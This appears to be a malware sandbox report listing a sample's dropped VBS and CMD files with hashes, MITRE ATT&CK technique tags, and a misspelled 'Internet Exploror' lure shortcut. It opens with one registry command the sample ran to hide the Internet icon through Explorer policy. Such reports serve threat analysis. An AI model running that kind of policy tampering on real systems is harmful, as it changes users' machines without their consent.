REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
1⤵
PID:2624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Windows\360SE.vbs

Filesize
194B

MD5
6b80c52f50e5365d484f500112c8fc4e

SHA1
1199341427821b402d5d2047e1c636132cfc1fb5

SHA256
934b4f7b2d356ee10e4fa8101d02bd32b9812af08e579b3407309b2102e2e381

SHA512
bba9444a31536d3364ca484ed0d167f77d4371cf25d7d0bbe33c154557f957c154a708931eda7fa4bbaac0e7c4150a4dd2021d5ebe73d500f72406eb599359fb

Download Submit
C:\Program Files\Windows\36OSE.vbs

Filesize
186B

MD5
662f2165658bc093dd1034e1fa967c19

SHA1
dfedd96e1beffd2f55a6c695bef3c02d9210c1e8

SHA256
8ae7f05d4c5adffd642515452ca81ec561711d244ef075da5fe654fee6528587

SHA512
ba3834b019150dbeef6bf423688b37888da75b868621b1f5541c0f4c4df145397d38d9adc26e363a59ea75909aa38d822189b04e87dbaa6273f9a59dba141a18

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
8a258828b4f552c8816b048516561d6f

SHA1
3d691f77eee7a3e221a7aabbeb31e4b8be09822e

SHA256
3e4a539cd25f1ccd715f2f774c57771c124860a30f54cc30b0ffff29150d224a

SHA512
4c0760a20633a1bdcd5a1aa45ebf9442320868c2b00f60715517c0369f4cce9eea7380713cfd101c5b6c30dccd3945a14e2c8b3df6487850e2c9963bf63751b7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
fb0af558e81f003623cecfa5546e3d5b

SHA1
2076780af9e74b359e4a666fd0537ebb2617dea2

SHA256
94223ba652bb91240e87a8b785088cde8d81430b9ab3ae14d05388cf4789ebe6

SHA512
d8ad6fc473bcdc23a773e65642504badeba2e317f36dcf54a0325ae03ca877b066f9163407fe165ddcf41ea6bfcfd8a388774ef4598c4fce12e7c0a895fcc0ca

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d189088443456d0551c6129b0d5c452a

SHA1
2e8c50cd325a313581fdab169de9ce597d2f961a

SHA256
002c3d0145d24be1edf1de6101d074c937d665b0d8982d30a87251d8b475af9b

SHA512
2384e9e4a2dc1bcc94b1daad41789e624c2cc861f32c387827fdbc34ea04f850b23d579e21339444e1219c3028f14ddce88e202f1054465d80357f028aed783d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
885cdf6a830eeaf912b1618af02ed09e

SHA1
62bb463526c64fac338afd582e1333f119db66de

SHA256
e87ebc70153e86c542de03eb76d5be4a85afd9c413c86454d6c9e1940d60c587

SHA512
d66f3a73ff8c78385fa036d0b7a078139fbb562f62c22f5b58dc1778202ce2bf3d5191d9b4b3579eeb4ce560966b6b53c4b3803418a2b9751900eb33bf1c7128

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
9c5a43790f5a671312728f1704cd7563

SHA1
5dc33a187ece03cbdacf982544562ab443596e0c

SHA256
f7658808814fa81f7d74765a4b8a15189d1cda721581826041036fb81523ab49

SHA512
7fc26801ad7051257e4388b357d1b0eb6768cc2355a8bea9933acaebfc4c50abb90fa23314ea511cba9a168b34bf18125dccfd2e28789a849f5595e321ce406f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
9a4f0757b3ae9aa773ea51150d1aaa4f

SHA1
26c3f18ea993aecbf0bb53b7a8c9ced51b2df0b3

SHA256
6879512edc81cfa3c4b590484f7f1a7c2a6be1c366c68925704e69c2c5b568fe

SHA512
1e17d3d72ab95c317ab66e0dd750e92985ebd5d64f2ed97f2d73b9d47043de0b2fe9001f453f9f65c677cd18ec60b805f06f6aa65d0bd43243cad15f1ed4efcf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6e24f5dd62ca37d0b63f685dd9db711a

SHA1
ead2e8961da1e6186091af29a6769d0c4904c567

SHA256
e8a3b605f773a81a5c8120fff83491b7deecdb0669bc1cbf1857ba06d5e1dab5

SHA512
d46d4b6efea14574b3760132660b9339921bee537584ca741ae74fa74d4fdcd427c3d1580019ca0cebf104a77d970b52d764d056abb867fa3ea700c8614ea195

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
cd0063af8e380b8af57d35eb1057aa87

SHA1
a2dfe8613ef0ea37041267670ded3aaeb6002cff

SHA256
6e9be7d5da8719c008175388b190c87067844fcff89ce596009a7bcf372f6050

SHA512
def733ca8b4b6f7428d04aaab66ef2cbe04d62bd574a24cf705ea4ddc6b46235f7f5f8df1af01e5ecb3297d47696b00a33f607ca7c319b47955cbef8a20770f1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c7d7d6107db4fecb53c8ef38b98ccb21

SHA1
6f125620a17eff55bc443791342a08f18666a437

SHA256
a8a67c40165587a43fc59e46b39656eddbf3b5fd9363d31ade476528152a4a60

SHA512
712c020ebdcf921875ea023780286a72991a0559d18f0792a50073d7c6fddf1fa41a5d2a7397ccb05594f315b9d68e338254cb2171caf0ce711d335c7ffa822e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
486d9bbff92328271def4aaa97479c9d

SHA1
bb3548665bb4541b3f9069bcd568ea5ee88f4385

SHA256
e47df3b81a4658d427d8258ca2eedae3b2da404a15954c58127abce3799b0d9e

SHA512
7c7f18c1b434699a7b68764bcf35058eef887d30fe46a0762f31915426516c887170a5f0774cea20e56d195def89758512dbc421d9a5409a5854edea6d3ad296

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab8548.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Internet Exploror.lnk

Filesize
104B

MD5
b6090a24bad18a0205bb215cb1fd42e6

SHA1
da56e637a186333e1fa8401b9600e9efcadbe86b

SHA256
5cf73d8ba3a6656e804041884cefc0148c3ef80fd4b8633a6647a033082f15f8

SHA512
4ca8a5cd200eaf8d8a023c47e7a279e41279c045bf567b81f95e93ca25d5a51dec2786de98efa5b907ec5633c8400e497f6bcaf636d4591d7c42e21ec3039ad4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ha.vbs

Filesize
1KB

MD5
97b8dddd4361596cdeb6851a0639d834

SHA1
7f35a8018d53777c449b9703a867c0f41b542e62

SHA256
fa554b0be47bc18d0992bf700e8495ad29237d88413faac60cc1850a51dedb80

SHA512
d3103e2bd9c5e272ae7f80e27c62ca70ee06adb6b6c85b2c60f34e781ed54f140caa1cb4f0787256e4e66cd47dd4047cee0bb50a13bac581a05f47d904009f4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\runonce.cmd

Filesize
11KB

MD5
6e419580c83dc37ea0d4180edf970d8d

SHA1
925a3a9bb26c499419a9af243bc2c7cc8269057d

SHA256
b9106c1bfd52fc13d097951b44d3f6f2023f5e31e9bbbf8dbccf8aad3b6adcd7

SHA512
9021fff118365e8d384ef7ac41779ea6eca60ff30da2d8d1e36a8382594847cb6bfdd0d614cee3c2cba6c20b998020dd2289ec642b6380691b0e8548046cd3a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tool.cmd

Filesize
3KB

MD5
d7eece295819ac643894e11ec290fc16

SHA1
eaf976563ab1d54ddbb538846f21d80663c0482b

SHA256
00057dbc21e30cd983f4428934333acc1243bef2a7ae3e89ccfed37aaea35aef

SHA512
61602cd5b19a9f3d65c52ec8b393081949167496ec02420fe403e5ee63a3f59f29d367246af4a6ba3a6437ea46759315f6e1721fbd44f84878b548e61d261036

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\winare.vbs

Filesize
995B

MD5
ca800c94c5577bfe494c00298f8d4bc4

SHA1
41aef2500e443dc7a1c614ad8a38dfd1035a728f

SHA256
e4004d757e7cb870d7846ff7dd328afba5a2dcc49e7fbe73c0d1c42e720d56b4

SHA512
ef38e3973685b3ad5bf4ca50858b6ca24756ea63eef955af2e9ae3d7cc86659ef37267e4bbbca938b143fff692ac65dfe64c37d9fd9ae6598650d8505dfb3bcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar92F4.tmp

Filesize
34KB

MD5
030cd9b4197d713f65e4eba14ab446ab

SHA1
0eb7c3ccdd3208572debc4c5ae91090ed6d514a6

SHA256
97587b73a4f1e4d04110dd88fe0fa3c1881f2f25460d1d43d005e87f86ddeed1

SHA512
055983bf5aae3def432263cde75cda39886b4ad7f39621a3414b3d1ac513863c022c7b7b34476b277ed6a06b6a1d2d5a36a67ac944db91bdd3ae6b176db22f1e

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads